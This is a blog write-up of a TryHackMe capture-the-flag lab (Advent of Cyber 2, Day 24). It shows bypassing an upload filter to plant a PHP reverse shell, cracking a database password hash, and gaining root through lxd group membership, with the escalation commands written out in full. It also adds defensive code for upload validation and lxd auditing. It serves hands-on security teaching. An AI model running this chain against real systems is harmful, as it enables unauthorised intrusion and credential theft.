TryHackMe — Advent of Cyber 2 — Day 24

Trent Darrow
7 min read · Dec 28, 2020


Good afternoon,

After a few days' hiatus to study for other work things, I'm back and going to finish up this Advent Calendar.

This last challenge/machine looks like it goes from nmap to enumeration, exploitation, privesc and full root access. It should be a fun machine. For now I'm going to avoid any and all hints, including the questions (I should be able to answer them down the road once I get full access). Anyhow, today's intro:

“It was the night before Christmas and The Best Festival Company could finally rest. All of the toys had been made and the company had recovered from attack after attack. Everything was in Santa’s hands now, leaving the elves to do little more than wish him a safe journey ahead. Elf McEager sat at his terminal staring absentmindedly at light snow that had begun to fall. Just as he had drifted off to sleep Elf McEager was jolted to attention as a small parcel appeared just at the edge of his view.

The present was wrapped in a deep blue velvet that appeared to shimmer in and out of the firelight, not unlike a blinking terminal prompt. Carefully, Elf McEager reached for the azure ribbon, untying it slowly so as to not damage it. The velvet slowly fell away, revealing a small NUC computer with a letter on top. Unfolding the letter, Elf McEager read it aloud:

“Elf McEager — your boundless effort to save Christmas this year has not gone unnoticed. I wanted to reward you with a special present, however, there’s a catch. Elf McSkidy and I have seen your skills advance and we feel it would only be appropriate to give you a present after one last challenge. Inside this package, you’ll have also found a computer. Plug this into the network and hack into it. Best of luck and Merry Christmas — Santa”

Without delay, Elf McEager connected the NUC appropriately and watched it whir to life. A small screen nearby the power button blinked and then displayed the IP address assigned to the device. Next to the IP, a small symbol appeared. McEager quietly wondered to himself what it could mean as he logged into his terminal, ready to start his final challenge.”

First let’s start off with an nmap.

root@kali:/mnt/hgfs/shared_folder/tryhackme# nmap -sV -sC 10.10.50.55
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-28 12:55 EET
Nmap scan report for 10.10.50.55
Host is up (0.15s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
65000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Light Cycle
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.43 seconds

So we get a standard HTTP port and another one at 65000 that is probably meant to be hidden. Let's take a quick look at that one while we run a gobuster against that port first (since it takes a while on my internet).

root@kali:/mnt/hgfs/shared_folder/tryhackme# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://10.10.50.55:65000/ -x php -e -t 5
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.50.55:65000/
[+] Threads: 5
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/12/28 13:31:06 Starting gobuster
===============================================================
http://10.10.50.55:65000/index.php (Status: 200)
http://10.10.50.55:65000/uploads.php (Status: 200)
http://10.10.50.55:65000/assets (Status: 301)
http://10.10.50.55:65000/api (Status: 301)
http://10.10.50.55:65000/grid (Status: 301)

Right away, we get an uploads.php page. I had a ton of connection request errors due to my internet slacking, so let's hope this works. Let's just upload a small text file and see if we can find it. We get an invalid file type (it looks like it only likes .png and .jpg/.jpeg), so let's try uploading a normal image and see where it goes. We've gotten a few hits on gobuster that we can check to find it.

While looking through the source code of the upload page and still getting an invalid file format for real jpg images, we find a filter.js file.

// Client-side upload filter served by the page: checks the declared MIME type
// and the last extension, then returns false regardless of the outcome.
const filter = file => {
    if (["image/png", "image/jpeg", "image/jpg"].indexOf(file.type) < 0) {
        return false;
    } else if (["png", "jpeg", "jpg"].indexOf(file.name.split(".").pop()) < 0) {
        return false;
    }
    //Let's be honest -- these things are dangerous. May as well always return false ¯\_(ツ)_/¯
    return false;
}

This always returns false, so if we can get rid of this file, we should be OK. Now I did have to look at the walkthrough portion to see how to accomplish this in Burp. After testing a reverse shell written in PHP locally, we can try to upload this script.

We can remove the filter.js portion of the source code through Burp. 

We can also confirm this if we view the source code of the uploads.php when we get the page back to Firefox.

We still needed to bypass the extension check on the file, as the upload form input still only allows those 3 file types.

Well, that still didn't work. Re-testing in a different way, we can leave that code in the source, but when the request comes in to forward that file in Burp, we can drop that file there. Now, let's test it out. I removed the .php portion of the file name and uploaded through Burp, received a success message, and we can confirm the file uploads to /grid.

And now we have success. I had the file extensions reversed: I needed .jpg.php, not .php.jpg. Simple mistake, but let's move forward.
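The reason both tricks above work is that filter.js runs in the browser and the extension check only looks at the last extension, so anything after the proxy is trusted. As an added example (not the room's code, and written in Node rather than the PHP the room actually serves, which is an assumption), this is the check a server should make instead: ignore the client's declared type, require every extension in the name to be on the allowlist, confirm the bytes really start with a PNG or JPEG signature, and choose the stored name itself.

```javascript
// Added example, not part of the original write-up: server-side validation
// that does not depend on anything the client claims about the file.
const ALLOWED_EXT = new Set(["png", "jpg", "jpeg"]);

// File signatures for the two image types the form is meant to accept.
const MAGIC = {
  png: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a],
  jpg: [0xff, 0xd8, 0xff],
  jpeg: [0xff, 0xd8, 0xff],
};

let counter = 0; // server-chosen names; the client never picks the path

function startsWith(bytes, sig) {
  if (bytes.length < sig.length) return false;
  return sig.every((b, i) => bytes[i] === b);
}

// Returns { ok: true, name } for an acceptable upload, else { ok: false, reason }.
function validateUpload(originalName, bytes) {
  // Basename only, so "../x.png" cannot escape the upload directory.
  const base = originalName.split(/[\\/]/).pop();
  const parts = base.split(".");
  if (parts.length < 2) return { ok: false, reason: "no extension" };
  // Every extension after the first dot must be allowed, so "shell.jpg.php"
  // is rejected, unlike the browser filter which only looked at the last one.
  const exts = parts.slice(1).map((e) => e.toLowerCase());
  if (!exts.every((e) => ALLOWED_EXT.has(e))) {
    return { ok: false, reason: "disallowed extension: " + exts.join(".") };
  }
  const ext = exts[exts.length - 1];
  // The declared MIME type is ignored; the content must match the extension.
  if (!startsWith(bytes, MAGIC[ext])) {
    return { ok: false, reason: "content is not a " + ext + " image" };
  }
  counter += 1;
  return { ok: true, name: "upload-" + counter + "." + ext };
}
```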

Anyhow, that reverse shell didn't work, so I used one from pentestmonkey. We now have a shell as www-data and can finally move forward.

When we take a look through the www directory, we find this gem.

We also find a rickroll.mp4. Nice. If we look in that directory it seems to just be a placeholder from the creator of the machine. But looking back, we find this dbauth.php file we can look at.

And it seems we get some creds for the database on the machine.

Once we get into the database we find some more creds, for flynn, that we can probably (hopefully) hit with John to see if we can escalate.

hash-identifier shows this is most likely MD5.

Using John, single rules, rockyou.txt and Raw-MD5, we get a hit extremely quickly.

And we are in.

Checking with sudo -l, we have no sudo rights, but we are in the lxd group, which we might be able to use. From here we can follow this article: https://www.hackingarticles.in/lxd-privilege-escalation/

Do this on the local machine:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python3 -m http.server 80

Then move to the remote machine:
wget http://10.8.137.78/alpine-v3.12-x86_64-20201228_1459.tar.gz
lxc launch ubuntu:18.04
lxc image import ./alpine-v3.12-x86_64-20201228_1459.tar.gz --alias myimage
lxc image list (verify that myimage is there)
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

Now we have a root shell and can finish with: cd /mnt/root/root
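From the defender's side, the chain above needs exactly two things: a non-root user in the lxd group, and a container that is both privileged and has the host's / mounted as a disk device. As an added example (not the room's code), this audits both conditions; the instance object is assumed to be shaped like the LXD API's instance JSON (config and devices maps, as returned by lxc query /1.0/instances/NAME), which is an assumption, and the /etc/group text is constructed.

```javascript
// Added example, not part of the original write-up: flag the two settings the
// lxd escalation relies on, from /etc/group text and an instance object.
const LXD_GROUPS = new Set(["lxd", "lxc"]);

// Non-root members of the lxd/lxc groups; membership is effectively root.
function lxdGroupMembers(groupFileText) {
  const members = [];
  for (const line of groupFileText.split("\n")) {
    const [name, , , userList] = line.split(":");
    if (!LXD_GROUPS.has(name) || !userList) continue;
    for (const u of userList.split(",")) {
      if (u && u !== "root") members.push(u);
    }
  }
  return members;
}

// Findings for one instance: privileged, plus any disk device whose source
// is the host root filesystem (the "source=/" device used above).
function auditInstance(name, inst) {
  const findings = [];
  const cfg = inst.config || {};
  if (String(cfg["security.privileged"]).toLowerCase() === "true") {
    findings.push(name + ": security.privileged=true (root inside is root on host)");
  }
  for (const [dev, d] of Object.entries(inst.devices || {})) {
    const hostRoot =
      typeof d.source === "string" && d.source.replace(/\/+$/, "") === "";
    if (d.type === "disk" && hostRoot) {
      findings.push(name + ": device " + dev + " mounts host / at " + d.path);
    }
  }
  return findings;
}
```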

Well, as always, I’ll leave that last flag for you. This was a fun machine, I for sure learned a few things and had a good time.

Throughout this Advent of Cyber 2 room, I learned a ton of things and had a good refresher on a few others. I want to thank all of those involved with creating this challenge and putting in the hard work for all of us trying to learn this skill.

As always, best of luck. If you enjoy my content, feel free to add me on LinkedIn and let me know you saw the blog.

Until next time,

-3lduderino
